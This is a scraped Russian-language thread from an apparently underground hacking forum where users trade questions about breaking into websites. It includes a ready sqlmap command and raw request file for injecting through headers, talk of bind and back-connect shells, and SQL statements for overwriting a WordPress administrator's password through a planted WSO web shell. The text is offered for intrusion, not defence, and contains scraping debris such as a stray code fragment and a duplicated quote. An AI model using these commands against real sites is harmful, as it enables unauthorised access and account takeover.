Ваши вопросы по уязвимостям.

23.02.2015, 14:00

5maks5

Постоянный

Регистрация: 29.08.2010

Сообщений: 448

С нами: 8265206

Репутация: 40

Цитата:

Сообщение от EksTasy

есть ли здесь уязвимость?

Это Opencart, нет ничего.

𝕏 Twitter Reddit Telegram Копировать ссылку

23.02.2015, 14:47

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от Unknowhacker

Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц

waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором

23.02.2015, 15:06

huntercs16

Участник форума

Регистрация: 07.10.2013

Сообщений: 140

С нами: 6630806

Репутация: 6

Парни,я понял что blind sql injection - это сначала запрос вида

select count(*) from pages where id=...

а потом

select * from pages where id=...

В случае если первый запрос возвращает 0 -происходит редирект.

Вопрос. Как часто происходит редирект в blind sql injection

24.02.2015, 21:46

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

С нами: 9061916

Репутация: 0

Цитата:

Сообщение от huntercs16

Парни,я понял что blind sql injection - это сначала запрос вида
select count(*) from pages where id=...
а потом
select * from pages where id=...
В случае если первый запрос возвращает 0 -происходит редирект.
Вопрос. Как часто происходит редирект в blind sql injection

Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.

25.02.2015, 11:10

Export

Новичок

Регистрация: 13.02.2010

Сообщений: 0

С нами: 8547867

Репутация: 0

Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.

26.02.2015, 03:37

preno

Участник форума

Регистрация: 05.09.2010

Сообщений: 245

С нами: 8255126

Репутация: 0

Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?

26.02.2015, 04:32

lifescore

Постоянный

Регистрация: 27.08.2011

Сообщений: 640

С нами: 7742486

Репутация: 72

Цитата:

Сообщение от preno

Ребята, как скулмапу скормить урл и если SQL в заголовке урла, как это сделать? Есть примеры?

./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0" --cookie="%Query_Cookie%" -u 'http://url.com/path/?id=1' --level=5 risk=3 -p %Parametr%

Или

-r и путь к файлу с HTTP запросом

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1

Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com

User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0

id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]

26.02.2015, 11:37

yeti2

Познающий

Регистрация: 15.09.2013

Сообщений: 68

С нами: 6662486

Репутация: 0

Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"

26.02.2015, 12:27

YaBtr

Постоянный

Регистрация: 30.05.2012

Сообщений: 600

С нами: 7343606

Репутация: 652

Цитата:

Сообщение от yeti2

Ребят , какой запрос в wso shell сделать , чтобы поменять Пароль в mysql базе . Допустим wordpress password "user_pass"

Сразу задавайте вопросы в соответвствующей теме.

Strilo4ka вчера Вам отвечал:

Цитата:

Сообщение от None

Цитата:

Сообщение от yeti2

как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой

Код:

update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

только Вы немного темой ошиблись.

" if author else f"

Цитата:

Сообщение от yeti2

как в wso shell'е заменить пароль в mysql wordpress базе. user_pass на свой

Код:

update `wp_users` set `user_pass`='$P$B7Ksq0R9XEPqj/ZD1/YOmG4TzToS24/' where id=1
update `wp_users` set `user_pass`= md5('123') where id=1

только Вы немного темой ошиблись.

#10

26.02.2015, 13:03

5maks5

Постоянный

Регистрация: 29.08.2010

Сообщений: 448

С нами: 8265206

Репутация: 40

Цитата:

Сообщение от Export

Юзать последнюю версию WSO.

Вот что она умеет:

Внести депозит

Депозит создан

Вывести депозит